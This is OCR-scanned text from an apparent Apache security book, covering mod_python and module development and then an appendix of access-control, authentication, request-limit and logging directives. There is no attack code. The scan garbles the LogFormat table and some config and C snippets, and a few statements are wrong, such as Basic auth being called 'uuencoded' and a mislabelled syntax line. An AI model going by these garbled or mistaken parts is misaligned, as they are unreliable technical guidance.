For random advertisements: 


<Location /ads> 

SetHandler rrandom-ad-page-ad-page 
RandomAd /usr/local/apache/servers_ad 
RandomAd /usr/local/ads/ 

RandomAd "<P>This is an add</P>" 
<Location> 


mod_python 


The preceding examples are intrinsically useful modules, but perform limited tasks, 
and extend Apache’s functionality in only limited, specific areas. Other modules 
exist, however, that perform more complicated operations, including the embedding 
of external language interpreters in Apache. 
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One such module is mod_python. As described by Gregory Trubetskoy in its documen- 
tation (http: //www.modpython.org/python1@/), mod_python 


...is an Apache server module that embeds the Python interpreter within the server and 
provides an interface to Apache server internals as well as a basic framework for simple appli- 
cation development in this environment. The advantages of mod_python are versatility and 


speed. 


Mr. Trubetskoy is modest about his achievement: 


mod_python is an Apache module. What makes it different from most other Apache modules is 
that it itself doesn’t do anything but provide the ability to do what Apache modules written in 
C do to be done in Python. To put it another way, it delegates phase processing to user- 


written Python code. 


NOTE 


Python is an interpreted, interactive, object-oriented programming language that incorporates 
modules, exceptions, dynamic typing, high-level dynamic data types, and classes. Python 
combines power with concise syntax, and interfaces with many system calls, libraries, window 
systems, and C and C++. It’s also a great extension language for applications that demand a 
programmable interface. Finally, Python is highly portable and runs on Unix, Mac, MS-DOS, 
Windows, Windows NT, and OS/2. Learn more about Python at http://www. python.org/. 





When Apache passes control to mod_python, the module runs through the following 
steps: 


1. Determines the interpreter to use by looking at directives currently in effect, 
possibly the server name and the directory. 


2. Gets or creates a subinterpreter. 


3. Gets or creates a CallBack object. (The CallBack object is a Python object 
whose methods provide all the functionality implemented in Python.) 


4. Creates an mp_request object. 


5. Calls CallBack.Dispatch() passing a reference to mp_request and the phase 
name being processed. 


6. Instantiates a request object, a wrapper around mp_request. 
7. Establishes sys.path by prepending the directory being accessed. 


8. Imports the Python module you specified in the configuration. 
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10. 


11. 


12. 


Locates the handler function/object inside the module. 
Calls the user function or object passing it a reference to a request object. 
Returns the return value to mod_python. 


Returns the return value and control to Apache. 


Trubetskoy accomplishes all this with astonishing economy. In-depth analysis of 
mod_python is beyond the scope of this chapter, but to see a superb job of module 
development, get mod_python at http: //www.modpython.org/. 


Module Development Considerations 


In reference to the security of your module, other than observing standard secure 
programming practices in C or Perl, try to anticipate other problems such as logic, 
filtering, directory traversal flaws, and other issues. The following list of papers and 
other resources will help you in this regard. 


The mod_perl Developer’s Cookbook (Sams, 2002) by Geoffrey Young, Paul 
Lindner, Randy Kobes. An excellent treatment of module programming that 
currently maintains a five-star reader recommendation at Amazon. Young and 
his fellow authors are well known in the Perl community, and have written 
many popular modules. 


Writing Apache Modules with Perl and C, (O'Reilly & Associates, 1999) by Lincoln 
Stein and Doug MacEachern. This book is a must-have for any Apache module 
developer. 


Network Programming with Perl, (Addison-Wesley, 2000) by Lincoln Stein. 


The Apache/Perl Module List. http: //perl.apache.org/src/apache- 
modlist.html. 


The Apache Overview HOWTO. http://www. linuxdoc.org/HOWTO/Apache - 
Overview-HOWTO.html1. 


“The Concrete Architecture of the Apache Web Server,” Octavian Andrei Dragoi 
and Jean Elizabeth Preston. An excellent study on how Apache operates and 
how modules plug in. http: //www.math.uwaterloo.ca/~oadragoi/CS746G/a2/ 
caa.html#apache_module. 


“Writing Modules for Apache 1.3.” Very informative PowerPoint presentation 
from Ken Coar on developing Apache modules. 

http: //web.golux.com/coar/slides/Writing Modules_for_Apache_1.3. 
slides.ppt. 
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e “LJ: At the Forge: Writing Modules for mod_perl,” Reuven M. Lerner. 
http://www. lerner.co.il/atf/columns/3351.html. 


e “How to Build the Apache of Your Dreams,” Darren Chamberlain. 
http: //www.devshed.com/Server_Side/Administration/APACHE/page1.html. 


e “From Apache 1.3 to Apache 2.0 Modules,” Apache development team. 
http://httpd.apache.org/docs-2.0/developer/modules.html. 


e “Apache for Developers,” Bjorn Borud. 
http: //www.devx.com/premier/mgznarch/webbuilder/1998/10@0ct98/bb1098/b 
b1098.asp. 


e “Introduction to programming for the Apache API,” Sameer Parekh. 
http: //modules.apache.org/doc/Intro_API_Prog.html. 


e “Writing Input Filters for Apache 2.0,” Ryan Bloom. 
http: //www.onlamp.com/pub/a/apache/2001/09/20/apache_2.html. 


e Ramneek Sharma, various documents on Apache. He did this for a CS course, 
and it’s great stuff that discusses architecture, the request phase, and an 
example. http: //wiki.cs.uiuc.edu/cs427/Ramneek+Sharma. 


Summary 


Apache’s modular design makes module development a snap, and you're limited 
only by your imagination. As you'll see in Appendix F, “What’s on the CD-ROM?” 
some folks have taken this to the limit, building modules that do many wonderful 
(and sometimes strange) things. After you get a solid grasp of the Apache API, you 
should be able to make Apache do nearly anything you want. However, remember 
that while Apache’s core code is tight from a security perspective, you must also 
write tight code. Thus, always consider what effect your module might have on 
Apache’s overall security. 
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Apache Security-Related 
Modules and Directives 


This appendix covers security-related Apache modules 
and directives, and summarizes their functionality. 


Apache modules and directives give you wide latitude in 
controlling Web resources, user authentication, proxy 
exchanges, and protocol implementation. In the following, 
you'll find summaries of each directive or module. For 
more detailed information, see the referenced chapter. 


<Limit> 
The <Limit> directive applies access control to the HTTP 


methods you specify. Methods are ways a client can request 
a URI (or an operation thereon) from a server. 


HTTP methods the <Limit> directive handles include the 
following: 


e CONNECT—Clients use CONNECT to request that a proxy 
establish a tunnel connection on their behalf. 


e coPY—Clients use COPY to request that Apache create 
a copy of the specified resource, identified by the 
Request -URI. 


e DELETE—Clients use the DELETE method to request 
that Apache delete the specified resource. 


e GET—Clients use GET to request that Apache return 
data contained in or associated with the specified 
URI. In other words, a GET request is a straight-ahead 
demand for a document, file, or directory. 
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e HEAD—The HEAD method is identical to the GET method, except that Apache 
doesn’t return an Entity -Body, only a header. Why would you want such a 
method? Because caching servers use it to check a URI’s status. Why send the 
entire document (on a simple status query), when you can send just a header 
instead? <Limit> handles HEAD requests the same way as GET requests. 


e LINK—Clients use LINK to request that Apache create a new link between the 
specified pages. LINK resembles POST in its operation, but clients don’t request 
storage space for the destination object. 


e LOCK—Clients use the LOCK method to create a lock (specified by the lockinfo 
element) on the Request -URI. Locking has several implications, and locks are 
themselves subject to unexpected contingencies. If a client requests (and 
Apache allows) a lock, that lock can still—at any time—drop or disappear if 
extraordinary circumstances arise. Different lock states exist, depending on the 
URI’s original status: None, Shared, and Exclusive. For an in-depth look at 
LOCK, see RFC 2518. 


e MKCOL—Clients use MKCOL to request that Apache derive a new collection (MKCOL 
is shorthand for Make Collection). A successful MKCOL creates a new collection 
resource at the Request -URI’s locale. For an in-depth look at the MKCOL method, 
see RFC 2518. 


e MOVE—Clients use MOVE to request that Apache move a resource from one place 
to another. For a move to succeed (even if Apache allows it), Apache must own 
the URI and its elements. For example, if the URI is dynamic (composed on- 
the-fly by two or more applications working in concert), a MOVE might not 
succeed because Apache may not control the second or third application (or 
fourth, fifth, and so on). For an in-depth look at MOVE, see RFC 2518. 


e OPTIONS—Clients use OPTIONS to request that Apache return all allowable 
methods for the specified URI. In other words, the client asks what methods 
Apache will allow for that particular resource. 


e PATCH—The PATCH method is similar to the PUT method, except that the client 
uses PATCH to request that Apache modify the specified entity. PATCH thus effec- 
tively invokes a forward-functional diff operation. PATCH is recondite and 
works only under limited circumstances (where Apache allows it and imple- 
ments a cache for this purpose). 


e POST—Clients use POST to request that Apache accept user input. When you 
send a search string, a message to be appended to a message board, or data 
intended for a database, your client sends a POST request. In POST requests, the 
client appends the submitted data to the request (and sometimes, this is visibly 
noticeable in the client’s Location field, such as when you send a search term 
and the resulting URL looks like this: http://www. somehost - 
somewhere. com/search?term=username). 
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e PROPFIND—The PROPFIND method is what the client uses to retrieve properties 
defined on the resource identified by the Request -URI. Developers commonly 
use the PROPFIND method in XML to ascertain the properties of an XML 
resource and its children. For in-depth information on the PROPFIND method, 
see RFC 2518. 


e PROPPATCH—The PROPPATCH method is what clients use to request that a server 
add or delete properties of the specified URI. PROPPATCH requests must carry a 
propertyupdate element. Developers sometimes use the PROPPATCH method in 
XML to alter the properties of an XML resource and its children. For in-depth 
information on the PROPPATCH method, see RFC 2518. 


e pUT—The PUT method is where the client requests to upload an object. 


e TRACE—The TRACE method is where the client requests a trace or, an applica- 
tion-layer loop-back. This is to ascertain the path and all machines therein— 
including any proxies along the route. 


e UNLINK—The UNLINK method is what a client uses to request that the server 
remove the specified object headers (such as a hypertext link between specified 


pages). 


e UNLOCK—The UNLOCK method is what the client uses to release a lock (specified 
by the lockinfo element) on the Request -URI. For an in-depth look at the 
UNLOCK method, see RFC 2518. 


It’s good form to specify access control rules elsewhere, such as in a <Directory> 
block, but the <Limit> directive will apply the specified access control to all the 
aforementioned HTTP methods. Syntax is as follows: 


<Limit HTTP -METHOD> 
Require valid-user 
</Limit> 


Here, HTTP-METHOD could be one or more methods. To add methods, place them in 
any order you like, but separate them by spaces. Note that <Limit> processes these in 
a case-sensitive context. Ensure that you enter your methods in uppercase. 


To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


<LimitExcept> 


<LimitExcept> is useful in light of the <Limit> directive’s function. Like <Limit>, 
<LimitExcept> handles the HTTP request methods CONNECT, COPY, DELETE, GET, HEAD, 
LINK, LOCK, MKCOL, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, PUT, TRACE, 
UNLINK and UNLOCK. 
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A <LimitExcept> specification is, however, the opposite of a <Limit> specification. 
Use it when you want to limit substantially more HTTP request methods than not. 
In other words, to limit all but the GET request method, rather than use <Limit> and 
specify a huge list, simply specify GET as the only allowable method. 


For example: 


<LimitExcept GET> 
Require valid-user 
</LimitExcept> 


To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


<VirtualHost> 


<VirtualHost> applies the access control rules you specify to one virtual host. It thus 
enables you to specify different access control rules to different virtual hosts. Indeed, 
<VirtualHost> lets you specify all properties and parameters of a virtual host that 
you can for the default or primary host, including but not limited to 


e The address 
e The ServerAdmin value 


e The DocumentRoot value 


The ServerName Value 


e Log locations 


For example: 


<VirtualHost 10.1.2.3> 

ServerAdmin webmaster@host.foo.com 
DocumentRoot /www/docs/host.foo.com 
ServerName host. foo.com 

ErrorLog logs/host.foo.com-error_log 
TransferLog logs/host.foo.com-access_log 
</VirtualHost> 


NOTE 


To see examples of virtual host configurations, check the Apache documentation here: 
http://httpd.apache.org/docs-2.0/vhosts/examples.html. 
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To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


AccessFileName 


The AccessFileName directive specifies the file that contains htpasswd access control 
rules. The prevailing tool for password-protecting Apache directories is (still) Rob 
McCool’s htpasswd. 


NOTE 


htpasswd itself has no relevant security history. However, Apache 1.2 had a buffer overflow in 
cfg_getline(), a function that read various files, including the htpasswd access files 
(.htpasswd and .htaccess, discussed next). This enabled users without the Web server UID 
to obtain such access and read such files. 





The htpasswd system historically offered access control at the user and group levels 
via three configuration files. Each file fulfilled a different function in the authentica- 
tion process: 


e .htpasswd—This was the default name for the password database. It stored 
username and password pairs. (.htpasswd vaguely resembles Unix’s 
/etc/passwd in this respect.) When users requested access to the protected Web 
directory, the server prompted them for a username and password. The server 
then compared these user-supplied values to those stored in .htpasswd. 


e .htgroup—This was the default htpasswd groups file. It stored group member- 
ship information (and in this respect, vaguely resembled Unix’s /etc/group). 


e .htaccess—This was the default htpasswd access file. It stored access rules 
(allow, deny), the location of configuration files, the authentication method, 
and so on. 


The AccessFileName directive tells Apache the name of your access file. This file stores 
your rules, and traditionally this was .htaccess, but today folks arbitrarily name this 
file. 


Syntax is: 
AccessFileName filename 
In this case, filename is whatever name you specify. In Apache versions prior to 1.3, 


you could specify only one such file. Today, AccessFileName takes multiple filename 
arguments. 
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Also, you can nest such access files. That is, you can protect /www/documents and 
also /www/documents/anonymous; each can have a different access file with different 
rules and different access control lists. Apache thus enables you to incisively dice 
and slice access control throughout your directory hierarchies. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AllowOverride 


Use the AllowOverride directive to specify what global access control directives a 
local .htaccess file can override. You specify overrides in three ways, either in inci- 
sive or sweeping fashion. 


AllowOverride takes three arguments: 


e All—This indicates that a local .htaccess file can override all earlier or global 
access control rules elsewhere specified. 


e None—This indicates that a local .htaccess file cannot override any previously 
articulated access control options. 


e Directive-Type—This indicates that a local .htaccess file can override any 
previously articulated access control options associated with the Directive- 
Type or types you specify. 


Directive types that an .htaccess file can override are AuthConfig (authorization 
directives), FileInfo (document types), Indexes (directory indexing), Limit (host 
access), and Options (directory features). To learn more, see Chapter 11, “Apache and 
Authentication: Who Goes There?” 


Anonymous 


The Anonymous directive, included in mod_auth_anon, grants anonymous users access 
to password-protected areas. Think of Anonymous as a second cousin to FTP’s anony- 
mous user, where you send your e-mail address (or any arbitrary string) as your pass- 
word. The difference is that Apache’s Anonymous directive grants anonymous users 
access without requiring any password. 


Syntax is: 


Anonymous user user user 


In establishing Anonymous rules, remember these conventions: 
e Anonymous takes multiple user arguments; you can specify one or several users. 


e Separate multiple user arguments by spaces (user? user2 users). 
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e If your user IDs contain spaces (for example, "anon user"), enclose strings in 
single or double quotes: "anon user" or 'Unknown User’. 


e The Anonymous directive processes user IDs in a case-insensitive fashion—it 
treats Anonuser and anonuser identically. 


e If user strings contain punctuation, escape special characters such as apostro- 
phes, asterisks, brackets, or other characters that shells interpret. To do so, 
precede such characters by a backslash (for example "I don\'t need a pass- 
word"). 


The Anonymous directive is part of mod_auth_anon. To learn more, see Chapter 11, 
“Apache and Authentication: Who Goes There? 


Anonymous Authoritative 


The Anonymous_Authoritative directive, included in mod_auth_anon, when set to on, 
denies access to all but anonymous users or user IDs. Hence, if a user enters any 
value but a valid anonymous ID, Apache denies access to the specified resource. 


Anonymous_Authoritative works with the Anonymnous directive. Note that if you fail 
to specify anonymous users (using the Anonymous directive), an enabled 
Anonymous_Authoritative will deny access to everyone—including you. (This is 
because Apache would be unable to find any valid anonymous user ID.) 


Syntax is: 


Anonymous Authoritative state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_LogEmail 


Anonymous_LogEmail, included in mod_auth_anon, when set to on, logs passwords that 
anonymous users provide to error_log. Hence, if users provide their e-mail addresses 
as passwords, you retain a record of them. 


NOTE 


Administrators that enable the Anonymous_Authoritative directive are optimistic about 
human nature, and as it turns out, they have good cause. In my experience, if the link that 
calls the password prompt is accompanied by a request that users provide e-mail addresses, a 
substantial number of users comply. 
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Syntax is: 


Anonymous Authoritative state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_MustGiveEmail 


The Anonymous _MustGiveEmail directive, included in mod_auth_anon, when set to on, 
requires anonymous users to supply their e-mail addresses as passwords. 


Syntax is: 


Anonymous MustGiveEmail state 


state is on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_NoUserID 


The Anonymous_NoUserID directive, included in module mod_auth_anon, when set to 
on, allows users access without supplying a user ID. Hence, when the username/pass- 
word window pops up, users can simply strike the Enter key or choose OK. Either 
action is sufficient to obtain the requested URI. 


Syntax is: 


Anonymous_NoUserID state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_VerifyEmail 


Anonymous VerifyEmail, included in module mod_auth_anon, when set to on, 
instructs Apache to verify—or try to verify—that visitors supply a valid e-mail 
address. To see the test, check mod_auth_anon.c, in the function anon_authenti- 
cate_basic_user(), beginning on line 222. Lines 255 through 272 detail the 
exchange. 


How prohibitive or stringent is the verification method? Not very: 
if { 
/* username is OK */ 


(res == OK) 
/* password been filled out ? */ 
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&& ((!conf->anon_auth_mustemail) || strlen(sent_pw) ) 
/* does the password look like an 
email address ? */ 

&& ((!conf->anon_auth_verifyemail) 

|| ((strpbrk("@", sent_pw) != NULL) 

&& (strpbrk(".", sent_pw) != NULL)))) { 

if (conf->anon_auth_logemail && ap_is_initial_req(r)) { 

ap_log rerror(APLOG MARK, APLOG_NOERRNO|APLOG_INFO, APR SUCCESS, r, 

"Anonymous: Passwd <%s> Accepted", 

sent_pw ? sent_pw: "\'none\'"); 


} 


return OK; 


Apache checks for an @ and a dot. Should it do more? No, and here’s why: If users 
want to get around such tests, they will. Writing complex routines to anticipate 
every possible user choice is a wasteful exercise. It is impractical—perhaps even 
impossible—to shell out and actually verify e-mail addresses. 


By way of comparison, Web developers sometimes force visitors to enter a telephone 
number. But developers can never verify the numbers they receive; they can barely 
validate them (the string must be void of letters and/or metacharacters, and also 
contain seven digits). Thus, Anonymous_VerifyEmail doesn’t perform exhaustive 
examinations; it merely guarantees that a malformed address will fail. 


Syntax is: 


Anonymous_VerifyEmail state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthAuthoritative 


The AuthAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower level modules instead of using 
simple .htaccess authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal .htaccess authentication as specified in your configuration files.) 


The purpose of AuthAuthoritative is to accommodate other modules that perform 
authentication. These could be modules that perform another type of Apache-spon- 
sored authentication, or third-party modules that perform additional user authenti- 
cation. Because these modules don’t use simple .htaccess authentication, you have 
to specify what Apache should do when such cases arise. 
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Syntax is: 


AuthAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthDBMAuthoritative 


The AuthDBMAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower level modules instead of using 
simple DMB-based authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal DBM authentication as specified in your configuration files.) 


The purpose of AuthDBMAuthoritative is to accommodate other modules that 
perform authentication. These could be modules that perform other types of Apache- 
sponsored authentication or third-party modules that perform additional user 
authentication. Because these modules don’t use simple DBM authentication, you 
have to specify what Apache should do when such cases arise. 


Syntax is: 


AuthDBMAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthDBMAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthDBMUserFile 


The AuthDBMUserFile directive, included in mod_auth, lets you specify the DBM user 
file’s name. 


Syntax is: 


AuthDBMUserFile path/filename 


path is the directory path to the DBM file, and filename is the DBM file’s name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?”. 
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AuthDBUserFile 


The AuthDBUserFile directive, included in mod_auth, lets you specify the DB file’s 
name. Such files contain username/password pairs for use in DB-based authentica- 
tion (with crypt() passwords). 


Syntax is: 


AuthDBUserFile path/ filename 


path is the directory path to the DBM file, and filename is the DB file’s name. 


AuthGroupFile 


The AuthGroupFile directive, included in mod_auth, lets you specify a plain text 
group file that contains group authorization information. 


Syntax is: 


AuthGroupFile path/ filename 


path is the directory path to the group file, and filename is the group file’s name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthLDAPAuthoritative 


The AuthLDAPAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower-level modules instead of using 
simple LDAP-based authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal LDAP authentication as specified in your configuration files.) 


The purpose of AuthLDAPAuthoritative is to accommodate other modules that 
perform authentication. These could be modules that perform other types of Apache- 
sponsored authentication, or third-party modules that perform additional user 
authentication. Because these modules don’t use simple LDAP authentication, you 
have to specify what Apache should do when such cases arise. 


Syntax is: 


AuthLDAPAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthLDAPAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 
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AuthName 


The AuthName directive, included as a core Apache functionality, lets you specify the 
authorization realm directory’s name. AuthName takes one argument: realm-name. 


Syntax is: 


AuthName realm-name. 


realm-name is the directory’s realm name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthType 


The AuthType directive, included as a core Apache functionality, lets you specify the 
user authorization type for the specified directory. 


Syntax is: 


AuthType type 


type is the authorization type, and Apache allows two of them: 


e Basic—This is basic authentication, which is Apache’s standard htpasswd 
variety. Note that while basic authentication provides effective password 
protection, it does not protect against eavesdropping. That’s because in basic 
authentication, passwords are sent in uuencoded format. 


e Digest—Here, Apache uses digest-based cryptographic authentication using 
MDS. MDS belongs to a family of one-way hash functions called message digest 
algorithms, and was originally defined in RFC 1321. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthUserFile 


AuthUserFile, included in mod_auth, lets you specify the location of a plain text file 
that stores username/password pairs. Passwords in such authorization files are 
crypt() encoded. 


Syntax is: 

AuthUserFile path/filename 

path is the directory path to the file; filename is whatever name you specify for the 
file. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 
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CookieExpires 


The CookieExpires directive, included in mod_usertrack, lets you specify the time 
when a cookie expires. CookieExpires gives you wide latitude in this regard, allow- 
ing you to set the time in seconds, minutes, hours, weeks, months, or years. 


Syntax is: 


CookieExpires time-frame 


time-frame is the period after which the cookie expires. 
Some conventions to consider when setting the time: 


e If you don’t define an expiration period, cookies that mod_usertrack generates 
will persist for the current session only; they’ll expire when the user ends the 
session or shuts down the client. 


e You can specify an expiration period in seconds simply by supplying a number 
(say, 500 for 500 seconds) as a single argument to CookieExpires. 


e If you specify more complicated rules, you must enclose those rules in quotes. 
To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


CookieLog 


The CookieLog directive, included in mod_log_config, lets you specify the cookie log 
filename. It is to this file that Apache will log cookie data. This is an outdated direc- 
tive, and ensures compatibility with mod_cookies. 


Syntax is: 


CookieLog filename 


filename is the cookie log’s filename. Note that you needn’t specify a path here, as 
the filename’s location is appended to ServerRoot’s value. Hence, if ServerRoot was 
/etc/httpd, and you specified the filename my-cookie-log, Apache would store the 
cookie log as /etc/httpd/my -cookie-1log. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


CookieTracking 

The CookieTracking directive, available in mod_user_track, lets you specify whether 
Apache should perform cookie tracking (and generate a cookie for each new client 
request). 
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Syntax is: 


CookieTracking state 


state is on (activate cookie tracking) or off (don’t). 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


CustomLog 


The CustomLog directive, included in mod_log_config, lets you set a log filename, a 
log format, and a conditional environment variable for logging. 


Syntax is: 


CustomLog filename format-or-nickname env 


e filename is the log’s name (relative to ServerRoot). 


e format-or-nickname is the file’s format. You can specify either a named format 
available from log_formats, or a nickname. Nicknames are names that you 
previously assigned to a log format you specified with the LogFormat directive. 


e env is an environment variable that you specify. This lets you control Apache’s 
logging behavior conditionally on what environment variable(s) occupy the 
request or transfer body. 


To learn more, see Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


IdentityCheck 


The IdentityCheck directive, included as a core feature, enables RFC 1413-style 
logging of remote user names. This comprises Apache’s support of the identification 
or ident protocol, previously known as the Authentication Server Protocol. 


ident user ID tracking is unreliable, chiefly because few hosts today run ident. 
Historical ident servers listened for TCP-based requests on port 113. They responded 
to properly formatted queries by returning the connection’s associated user ID. That 
is, the ident server on the client system would reply to interested servers with the 
user ID that initiated the session from the client. 


NOTE 


Using IdentityCheck is generally not worth the trouble, for two reasons: First, as | related 
previously, few systems run ident today. Hence, Apache may waste considerable resources 
only to reap no results. (After all, systems with no ident server running cannot provide user 
IDs.) Second, even when remote client systems do run ident, the query process can take 
some time: 10 seconds, 30 seconds, a minute, and so on. 
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Syntax is: 


IdentityCheck state 


state is on or off. 


Learn more in Chapter 11, “Apache and Authentication: Who Goes There?” 


LimitRequestBody 

The LimitRequestBody directive, included in Apache’s core system, lets you limit the 
client’s request body to a specific size. (This functionality is only available in versions 
1.3.2 and later.) 


Syntax is: 


LimitRequestBody value 


value is a numeric value that you specify. This could be 0, which represents an 
unlimited request body size, all the way up to 2 gigabytes, although few request 
bodies will come anywhere near 2 gigs. Certain denial-of-service attacks (and other 
malicious actions) often require attackers to send impossibly long strings in their URI 
requests. LimitRequestBody offers you a mechanism by which to prevent such 
attacks. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitRequestFields 

The LimitRequestFields directive, included in Apache’s core system, lets you limit 
the number of request fields a client can send in its request. This functionality is 
only available in versions 1.3.2 and later. 


Syntax is: 

LimitRequestBody value 

value is a numeric value that you specify. This could be 0, which represents an 
unlimited request body size, all the way up to 32767. Certain denial-of-service 
attacks (and other malicious actions) often require attackers to send overwhelming 


request headers in their requests. LimitRequestFields offers you a mechanism by 
which to prevent such attacks by controlling the number of request fields. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
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LimitRequestFieldsize 


The LimitRequestFieldsize directive, included in Apache’s core system, lets you 
limit the client’s request field size. This functionality is only available in versions 
1.3.2 and later. 


Syntax is: 

LimitRequestFieldsize value 

value is a numeric value that you specify. This could be 0, which represents an 
unlimited request field size, all the way up to 8190 bytes. Certain denial-of-service 
attacks and other malicious actions require attackers to send impossibly long strings 


in their URI fields. LimitRequestFieldsize offers you a mechanism by which to 
prevent such attacks. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitRequestLine 


The LimitRequestLine directive, included in Apache’s core system, lets you limit the 
client’s request line size to a value less than the compiled-in default (8190). This 
functionality is only available in versions 1.3.2 and later. 


Syntax is: 

LimitRequestLine value 

value is a numeric value that you specify. This could be 0, which represents an 
unlimited request field size, all the way up to 8189 bytes. Certain denial-of-service 
attacks and other malicious actions require attackers to send impossibly long strings 


in their request lines. LimitRequestLine offers you a mechanism by which to 
prevent such attacks. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitXMLRequestBody 


The LimitXMLRequestBody directive, included in Apache’s core system, lets you limit 
the client’s XML request body size. 


Syntax is straight-ahead: 


LimitXMLRequestBody value 


value is a value you specify in bytes, and this value could be anything. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
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LockFile 
The LockFile directive lets you sets the lockfile’s path. 


Syntax is: 


LockFile path 


path here is the directory path leading to the lockfile. 


NOTE 


Remember that you must store the lockfile in a real directory on the local hard disk drive. Do 
not try to NFS your lockfile. 





Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LogFormat 


The LogFormat directive, available in mod_log_config, lets you specify what data 
Apache should log and how to format it. 


Syntax is: 

LogFormat format-directives|nickname 

format -directives is a list that describes each data element that Apache will record. 
nickname is a label with which to associate the specified format data element list. 


(This way, you needn’t articulate the list again and again when communicating it to 
other directives. Instead, you can simply use the nickname.) 


Table A.1 below lists Apache LogFormat directives and what they signify. 


TABLE A.1 httpd LogFormat Directives 
Directive What It Does 





oe 


e The %e directive will define the specified environment variable. 


œ 
o 


The %b directive records the total number of bytes sent (not including 
headers). 


œ 
Ss 


The %f directive records the filename requested. 
The %h directive records the remote host’s address. 


oe æ 
e 


The %1 directive records the logname (username) of the client’s user(if they're 
running ident). 
The %P directive records the PID of the process that satisfied the client's 


Æ 
U 


request. 
The %p directive records the port that the server directed the response to. 


oe 
ne} 


The %r directive records the first line of the client’s request. 


oe 
S 
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TABLE A.1 Continued 
Directive What It Does 





oe 
no 


The %s directive records the status of the client’s request. 


oe 
ae 


The %t directive records the time of the request. 


oe 
4 


The %T directive records the time taken to satisfy the client’s request. 


ow 
= 


The %u directive records the remote user (using auth). 


oe 
Cc 


The %U directive records the URL that the client initially requested. 
The %v directive records the virtual hosts hostname. 


oe 
< 





Here’s the default: 


LogFormat "%h %l %u %t \"%r\" %s %b" 


This indicates that by default, Apache would log: 
e The remote host address 


e The remote logname (unreliable and available only if the client box is running 
ident) 


e The remote user (unreliable also) 

e The time (standard log format, for example Wed Dec 12 14:55:49 PST 2001) 
e The client’s first request 

e The status 


e The bytes sent 
To learn more, see Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


mod_access 
mod_access provides access control based on client hostname or IP address. 


mod_access provides this access control through .htaccess files and within 
<Directory>, <Files>, and <Location> directive blocks. 


mod_access directives for controlling access are as follows: 


e Allow—This specifies that Apache should allow users from a domain name, 
partial domain name, full IP address, partial IP address, or network range you 
specify. 


e Deny—This specifies that Apache should deny users from a domain name, 
partial domain name, full IP address, partial IP address, or network range you 


specify. 
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e Order—This lets you specify the order in which Apache processes your Allow 
and Deny directives. That order can be Deny, Allow (Deny directives first), 
Allow, Deny (Allow directives first), or Mutual- failure, which is essentially 
Allow, Deny. 


Learn more in Chapter 10, “Apache Network Access Control.” 


mod_auth 


mod_auth manages HTTP Basic authentication using plain text password and group 
files in the .htpasswd system. With Basic authentication, Apache queries .htaccess 
files. These store your access rules and file locations. 


Here’s a sample .htaccess file: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /dev/null 

AuthName Nicole 

AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


The file contains five directives and their corresponding values: 


e AuthUserFile—The AuthUserFile directive points to the location of the 
. htpasswd database. When you set AuthUserFile, specify the full path to 
- htpasswd. 


e AuthGroupFile—The AuthGroupFile directive points to the location of your 
group access file (normally .htgroup). In this simple example, no group file 
exists, so that value is set via the AuthGroupFile directive to /dev/null. 


e AuthName—The AuthName directive stores a user-defined text string to display 
when the authentication dialog box appears. When users request access, they 
see a username/password prompt. The caption requests that they Enter 
Username for AuthName at hostname. While the server fills in the hostname 
variable, you must specify the AuthName variable’s value. 


e AuthType—The AuthType directive identifies the authentication method. The 
previous example specifies Basic authentication, the most commonly used and 
simplest type. 


e Limit—The Limit directive controls which users are allowed access, what type 
of access they can obtain (for example, GET, PUT, and POST), and the order in 
which Apache evaluates these rules. 
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The Limit directive’s four internal directives refine controls: 


